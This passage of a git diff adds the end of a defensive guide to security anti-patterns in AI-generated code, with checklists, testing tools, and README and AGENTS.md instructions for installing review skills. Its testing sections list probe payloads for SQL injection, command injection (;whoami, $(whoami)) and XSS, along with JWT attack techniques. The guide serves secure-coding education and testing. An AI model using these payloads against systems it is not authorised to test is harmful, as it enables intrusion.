+|---|---------|------------|--------------|------------| +| 1 | **Hardcoded Secrets** | Critical | Very High | Credential theft, API abuse, data breaches | +| 2 | **SQL/Command Injection** | Critical | High | Database compromise, RCE, system takeover | +| 3 | **Cross-Site Scripting (XSS)** | High | Very High | Session hijacking, account takeover, defacement | +| 4 | **Authentication/Session** | Critical | High | Complete authentication bypass, privilege escalation | +| 5 | **Cryptographic Failures** | High | Very High | Data decryption, credential exposure, forgery | +| 6 | **Input Validation** | High | Very High | Enables all other injection attacks | + +### Why These 6 Patterns Matter + +**They are interconnected:** Input validation failures enable injection attacks. Cryptographic failures expose the secrets that hardcoded credentials would have protected. Authentication weaknesses make XSS more devastating. + +**AI models struggle with all of them:** Training data contains countless examples of insecure patterns. AI models optimize for "working code" rather than "secure code." The patterns that make code secure are often invisible (environment variables, parameterized queries, proper encoding) while insecure patterns are explicit and visible. + +**They have compounding effects:** A single hardcoded secret can expose thousands of users. A single SQL injection can dump an entire database. A single XSS vulnerability can persist across sessions and users. + +--- + +# Critical Checklists: One-Line Reminders + +These condensed checklists provide quick reference for each pattern. Use during code review or before committing changes. + +## Pattern 1: Hardcoded Secrets + +| ✓ | Checkpoint | +|---|------------| +| □ | No API keys, passwords, or tokens in source files | +| □ | All secrets loaded from environment variables or secret managers | +| □ | `.env` files in `.gitignore` with `.env.example` for templates | +| □ | No secrets in logs, error messages, or URLs | +| □ | Secret scanning enabled in CI/CD pipeline | +| □ | Credentials rotated regularly and rotation is automated | + +## Pattern 2: SQL/Command Injection + +| ✓ | Checkpoint | +|---|------------| +| □ | All SQL queries use parameterized statements (no string concatenation) | +| □ | Dynamic identifiers (table/column names) validated against allowlist | +| □ | ORM queries reviewed for raw query vulnerabilities | +| □ | Shell commands avoid user input; if required, use allowlist validation | +| □ | Second-order injection checked (stored data used in queries) | +| □ | Prepared statements used for ALL query types (SELECT, INSERT, ORDER BY) | + +## Pattern 3: Cross-Site Scripting (XSS) + +| ✓ | Checkpoint | +|---|------------| +| □ | HTML encoding for HTML body context | +| □ | Attribute encoding for HTML attributes (especially event handlers) | +| □ | JavaScript encoding for inline scripts | +| □ | URL encoding for URL contexts | +| □ | CSP headers configured with strict policy (no `unsafe-inline`) | +| □ | `innerHTML` avoided; use `textContent` or framework safe bindings | +| □ | Sanitization libraries tested against mutation XSS | + +## Pattern 4: Authentication/Session Security + +| ✓ | Checkpoint | +|---|------------| +| □ | Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) | +| □ | Session tokens cryptographically random (256+ bits entropy) | +| □ | JWT algorithm explicitly validated (`alg: none` rejected) | +| □ | Tokens stored in HttpOnly, Secure, SameSite cookies | +| □ | Session invalidated on logout (server-side) | +| □ | Constant-time comparison for password/token verification | +| □ | Rate limiting on authentication endpoints | + +## Pattern 5: Cryptographic Failures + +| ✓ | Checkpoint | +|---|------------| +| □ | AES-256-GCM or ChaCha20-Poly1305 for symmetric encryption | +| □ | Fresh random IV/nonce for every encryption operation | +| □ | CSPRNG used for all security-sensitive random values | +| □ | bcrypt/Argon2id for password hashing (not PBKDF2 for passwords) | +| □ | Key derivation uses HKDF or PBKDF2 with appropriate iterations | +| □ | No ECB mode, no static IVs, no Math.random() | +| □ | Constant-time comparison for MAC/signature verification | + +## Pattern 6: Input Validation + +| ✓ | Checkpoint | +|---|------------| +| □ | All validation performed on server side | +| □ | Schema validation with `additionalProperties: false` | +| □ | All regex patterns anchored with `^` and `$` | +| □ | Length limits checked BEFORE regex matching | +| □ | Null bytes rejected in string input | +| □ | Unicode normalized before validation | +| □ | Type coercion explicit with error handling | + +--- + +# Testing Recommendations by Vulnerability Type + +## Hardcoded Secrets Testing + +```pseudocode +// Automated Secret Detection +1. Pre-commit hooks with secret scanners: + - TruffleHog + - detect-secrets + - gitleaks + - git-secrets + +2. CI/CD Pipeline Scanning: + - Run on every PR/MR + - Scan full git history on merge to main + - Block deployment on secret detection + +3. Runtime Detection: + - Log analysis for credential patterns + - API request auditing for hardcoded keys + - Cloud provider secret exposure alerts + +// Testing Checklist +- [ ] Scan all source files for API key patterns +- [ ] Scan all config files for password strings +- [ ] Check git history for past secret commits +- [ ] Verify environment variables are properly loaded +- [ ] Test application behavior when secrets are missing +- [ ] Verify secrets are not exposed in error messages +``` + +## SQL/Command Injection Testing + +```pseudocode +// Automated Testing Tools +1. SAST (Static Analysis): + - Semgrep with injection rules + - CodeQL injection queries + - SonarQube SQL injection checks + +2. DAST (Dynamic Analysis): + - SQLMap for SQL injection + - Burp Suite active scanning + - OWASP ZAP automated scan + +3. Manual Testing Payloads: + // SQL Injection + - Single quote: ' + - Comment: -- or # + - Boolean: ' OR '1'='1 + - Time-based: '; WAITFOR DELAY '0:0:10'-- + - Union: ' UNION SELECT null,null-- + + // Command Injection + - Semicolon: ;whoami + - Pipe: |id + - Backticks: `whoami` + - Command substitution: $(whoami) + - Newline: %0a id + +// Testing Checklist +- [ ] Test all user input fields with injection payloads +- [ ] Test ORDER BY, LIMIT, table name parameters +- [ ] Test stored data for second-order injection +- [ ] Test file paths for command injection +- [ ] Verify all queries use parameterization +- [ ] Check logs don't reveal injection success/failure +``` + +## XSS Testing + +```pseudocode +// Automated Testing +1. Browser Tools: + - DOM Invader (Burp) + - XSS Hunter + - DOMPurify testing mode + +2. Automated Scanners: + - Burp Suite XSS scanner + - OWASP ZAP active scan + - Nuclei XSS templates + +3. Manual Testing Payloads: + // HTML Context + - + - + - + + // Attribute Context + - " onmouseover="alert(1) + - ' onfocus='alert(1)' autofocus=' + + // JavaScript Context + - '-alert(1)-' + - ';alert(1)// + - \u003cscript\u003e + + // URL Context + - javascript:alert(1) + - data:text/html, + +// Testing Checklist +- [ ] Test all output points with context-specific payloads +- [ ] Test encoding bypass techniques +- [ ] Test DOM XSS with source/sink analysis +- [ ] Verify CSP headers block inline scripts +- [ ] Test mutation XSS with sanitizer bypass payloads +- [ ] Check for polyglot XSS across contexts +``` + +## Authentication/Session Testing + +```pseudocode +// Testing Tools +1. Session Analysis: + - Burp Suite session handling + - OWASP ZAP session management + - Custom scripts for token analysis + +2. JWT Testing: + - jwt.io debugger + - jwt_tool + - jose library testing + +3. Manual Testing: + // Session Token Analysis + - Check entropy (should be 256+ bits) + - Test token predictability + - Test session fixation + + // JWT Attacks + - Algorithm confusion (RS256 → HS256) + - None algorithm bypass + - Key injection attacks + - Signature stripping + + // Authentication Bypass + - SQL injection in login + - Password reset token prediction + - OAuth state parameter manipulation + +// Testing Checklist +- [ ] Test session token randomness +- [ ] Verify session invalidation on logout +- [ ] Test for session fixation +- [ ] Verify JWT algorithm validation +- [ ] Test rate limiting on login +- [ ] Check for timing attacks on password comparison +- [ ] Test password reset flow for token issues +``` + +## Cryptographic Implementation Testing + +```pseudocode +// Crypto Testing Tools +1. Static Analysis: + - Semgrep crypto rules + - CryptoGuard + - Crypto-detector + +2. Manual Review: + // Check for weak algorithms: + grep -r "MD5\|SHA1\|DES\|RC4\|ECB" . + + // Check for static IVs: + grep -r "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" . + + // Check for weak randomness: + grep -r "Math\.random\|random\.random\|rand\(\)" . + +3. Runtime Testing: + - Encrypt same plaintext twice, verify different ciphertext + - Test key derivation iterations (should take 100ms+) + - Verify timing consistency in comparisons + +// Testing Checklist +- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage +- [ ] Confirm unique IV/nonce per encryption +- [ ] Test password hashing takes appropriate time (100ms+) +- [ ] Verify CSPRNG used for all secrets +- [ ] Check key derivation iteration counts +- [ ] Test for padding oracle vulnerabilities +- [ ] Verify constant-time comparison functions +``` + +## Input Validation Testing + +```pseudocode +// Testing Approach +1. Boundary Testing: + - Empty strings, null, undefined + - Max length + 1 + - Integer boundaries (MAX_INT, MIN_INT) + - Unicode normalization variants + +2. Type Confusion: + - Array where string expected: ["value"] + - Object where string expected: {"$gt": ""} + - Number where string expected: 12345 + - Boolean where object expected: true + +3. Encoding Bypass: + - URL encoding: %00, %2e%2e%2f + - Unicode: \u0000, \ufeff + - Double encoding: %252e + - Overlong UTF-8 + +4. ReDoS Testing: + - For each regex, test with: (valid_char * 30) + invalid_char + - Measure response time (should be < 100ms) + - Use regex-dos-detector tools + +// Testing Checklist +- [ ] Test all endpoints with null/empty values +- [ ] Test numeric fields with boundary values +- [ ] Test string fields with max length exceeded +- [ ] Test type confusion for all input fields +- [ ] Test regex patterns for ReDoS +- [ ] Verify server-side validation matches client-side +- [ ] Test Unicode normalization issues +``` + +--- + +# Additional Patterns Reference + +This depth document covers the 6 most critical patterns in extensive detail. For coverage of additional security anti-patterns, see [[ANTI_PATTERNS_BREADTH]], which includes: + +| Pattern Category | Patterns Covered | +|-----------------|------------------| +| **File System Security** | Path traversal, unsafe file uploads, insecure temp files | +| **Access Control** | Missing authorization checks, IDOR, privilege escalation | +| **Network Security** | SSRF, insecure deserialization, unvalidated redirects | +| **Error Handling** | Information disclosure, stack traces, verbose errors | +| **Logging Security** | Sensitive data in logs, insufficient logging | +| **Concurrency** | Race conditions, TOCTOU, deadlocks | +| **Dependency Security** | Outdated dependencies, slopsquatting, lockfile tampering | +| **Configuration** | Debug mode in production, default credentials | +| **API Security** | Mass assignment, excessive data exposure, rate limiting | + +Use the breadth document for quick reference across many patterns. Use this depth document for comprehensive understanding of the most critical patterns. + +--- + +# External Resources + +## OWASP Resources + +- **OWASP Top 10 (2021):** https://owasp.org/Top10/ +- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/ +- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/ +- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/ + +### Relevant Cheat Sheets + +| Pattern | OWASP Cheat Sheet | +|---------|-------------------| +| Secrets Management | [Secrets Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html) | +| SQL Injection | [Query Parameterization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html) | +| XSS | [XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) | +| Authentication | [Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html) | +| Session Management | [Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html) | +| Cryptography | [Cryptographic Storage Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html) | +| Input Validation | [Input Validation Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html) | + +## CWE References + +- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html +- **CWE/SANS Top 25:** https://www.sans.org/top25-software-errors/ + +### CWE Mappings for This Document + +| Pattern | Primary CWEs | +|---------|--------------| +| Hardcoded Secrets | CWE-798, CWE-259, CWE-321, CWE-200 | +| SQL Injection | CWE-89, CWE-564 | +| Command Injection | CWE-78, CWE-77 | +| XSS | CWE-79, CWE-80, CWE-83, CWE-87 | +| Authentication | CWE-287, CWE-384, CWE-613, CWE-307 | +| Session Security | CWE-384, CWE-613, CWE-614, CWE-1004 | +| Cryptographic Failures | CWE-327, CWE-328, CWE-329, CWE-338, CWE-916 | +| Input Validation | CWE-20, CWE-1333, CWE-185, CWE-176 | + +## AI Code Security Research + +- **GitHub Copilot Security Analysis:** https://arxiv.org/abs/2108.09293 +- **Stanford/Asleep at the Keyboard Study:** https://arxiv.org/abs/2211.03622 +- **USENIX Package Hallucination Study (2024):** https://www.usenix.org/conference/usenixsecurity24 +- **Veracode State of Software Security (2024-2025):** https://www.veracode.com/state-of-software-security-report +- **Snyk Developer Security Survey (2024):** https://snyk.io/reports/ + +## Security Testing Tools + +| Tool | Purpose | URL | +|------|---------|-----| +| Semgrep | Static analysis with security rules | https://semgrep.dev | +| CodeQL | GitHub security queries | https://codeql.github.com | +| TruffleHog | Secret scanning | https://github.com/trufflesecurity/trufflehog | +| SQLMap | SQL injection testing | https://sqlmap.org | +| Burp Suite | Web security testing | https://portswigger.net/burp | +| OWASP ZAP | Open source web security scanner | https://www.zaproxy.org | +| jwt_tool | JWT security testing | https://github.com/ticarpi/jwt_tool | +| gitleaks | Git secret scanning | https://github.com/gitleaks/gitleaks | + +--- + +# Document Information + +**Document:** AI Code Security Anti-Patterns: Depth Version +**Version:** 1.0.0 +**Last Updated:** 2026-01-18 +**Patterns Covered:** 6 (Hardcoded Secrets, SQL/Command Injection, XSS, Authentication/Session, Cryptography, Input Validation) + +## Change Log + +| Date | Version | Changes | +|------|---------|---------| +| 2026-01-18 | 1.0.0 | Initial release with 6 comprehensive pattern deep-dives | + +## Related Documents + +- [[ANTI_PATTERNS_BREADTH]] - Quick reference covering 25+ security patterns +- [[Ranking-Matrix]] - Priority scoring methodology and pattern rankings +- [[Pseudocode-Examples]] - Additional code examples for all patterns + +## Contributing + +This document is maintained as part of the AI Code Security Anti-Patterns project. Security patterns evolve as new research emerges and AI models change. Contributions welcome for: + +- New edge cases and exploitation techniques +- Updated statistics and research citations +- Additional testing methodologies +- Framework-specific secure coding examples + +--- + +*This document is designed to be included in AI assistant context windows to improve the security of generated code. For maximum effectiveness, include along with [[ANTI_PATTERNS_BREADTH]] when reviewing or generating security-sensitive code.* + +--- + +**END OF DOCUMENT** diff --git a/AGENTS.md b/AGENTS.md new file mode 100644 index 0000000..3ba14a8 --- /dev/null +++ b/AGENTS.md @@ -0,0 +1,32 @@ +# Repository Guidelines + +This repository is a content-first security reference. It ships two large Markdown guides plus a static landing page. + +## Project Structure & Module Organization +- `ANTI_PATTERNS_BREADTH.md`: Broad catalog of 25+ AI code security anti-patterns with quick references. +- `ANTI_PATTERNS_DEPTH.md`: Deep-dive coverage of the 7 highest-priority vulnerabilities. +- `index.html`: Static landing page for the GitHub Pages site. +- `README.md`: Project overview, usage guidance, and source context. + +## Build, Test, and Development Commands +There are no build or test scripts in this repository today. +- To preview changes, open `index.html` in a browser. +- To edit content, modify the Markdown files directly. + +## Coding Style & Naming Conventions +- Markdown: keep headings short and scannable; use fenced code blocks for examples. +- HTML: keep changes minimal and readable; prefer semantic elements. +- Filenames follow `UPPER_SNAKE_CASE.md` for the large guides and conventional names for web assets. + +## Testing Guidelines +No automated tests are configured. If you add tests or tooling, document the command(s) here and in `README.md`. + +## Commit & Pull Request Guidelines +Recent history uses simple, descriptive summaries like `Update index.html` or `Update README.md`. +- Use short, direct commit messages that name the file or feature you changed. +- PRs should include a brief description of the change and, if relevant, a link to supporting sources or examples. + +## Security & Content Integrity +- Do not include secrets or sensitive data in examples. +- Ensure any new anti-patterns include mitigation guidance and clear BAD/GOOD comparisons. +- If adding statistics, provide a credible source and keep wording precise. diff --git a/README.md b/README.md index eaf1106..9c00abb 100644 --- a/README.md +++ b/README.md @@ -136,10 +136,87 @@ The goal isn't to replace human security review—it's to catch the obvious, wel --- +## Install + +### Option 1: Clone with Git +``` +git clone https://github.com/arcanum-sec/sec-context.git +cd sec-context +``` + +### Option 2: Download ZIP +Download the repository ZIP from GitHub, extract it, and open the folder. + +### Files You'll Use +``` +ANTI_PATTERNS_BREADTH.md +ANTI_PATTERNS_DEPTH.md +``` + +If you only want the content, those two files are all you need. + +--- + ## Contributing Found a pattern we missed? Have a better example? PRs are welcome =) --- +## Claude Skill (Claude Code) + +This repo includes a Claude skill at `.claude/skills/security-review-swarm`. + +### What it does +`security-review-swarm` orchestrates parallel security-review agents to scan code for the anti-patterns in this repo. It supports a fast single-agent scan and deeper multi-agent reviews. + +### Usage +``` +/security-review # quick breadth review +/security-review src/ # review a specific path +/security-review --deep # deep single-agent audit +/security-review --full # full swarm: parallel specialists +``` + +### Review modes +- **Quick (default):** one agent using breadth patterns (25+). +- **Deep (`--deep`):** one agent using depth patterns (7 critical). +- **Full (`--full`):** seven parallel specialists (secrets, injection, XSS, auth, crypto, input validation, dependencies). + +### Auto-escalation rules +The swarm skill automatically switches to **deep** or **full** review when: +- Paths include auth/session/payment/crypto-related folders. +- File contents include tokens/secrets/JWT-related keywords. +- The scope is large (50+ files) or the user requests a comprehensive audit. + +### Install +Copy `.claude/skills/security-review-swarm` into your Claude Code skills directory and enable it there. The skill references `references/ANTI_PATTERNS_BREADTH.md` and `references/ANTI_PATTERNS_DEPTH.md` bundled in the same folder. + +## Codex Skill (CLI) + +### Install (from GitHub) +Use the Codex installer script: +```bash +scripts/install-skill-from-github.py --repo gusfraser/sec-context --path .codex/skills/sec-context +``` + +To install from the upstream repo instead: +```bash +scripts/install-skill-from-github.py --repo Arcanum-Sec/sec-context --path .codex/skills/sec-context +``` + +Restart Codex after installation so the new skill is picked up. + +### Install (manual copy) +1. Copy the skill folder into your Codex skills directory: + - Example: `$CODEX_HOME/skills/sec-context` +2. The skill bundles its references under: + - `.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md` + - `.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md` + +### Verify +Open `SKILL.md` to confirm the frontmatter and references resolve as expected in your environment. + +--- + *Built by synthesizing 150+ sources across academic papers, CVE databases, security blogs, and developer communities. Because AI shouldn't keep making the same security mistakes.*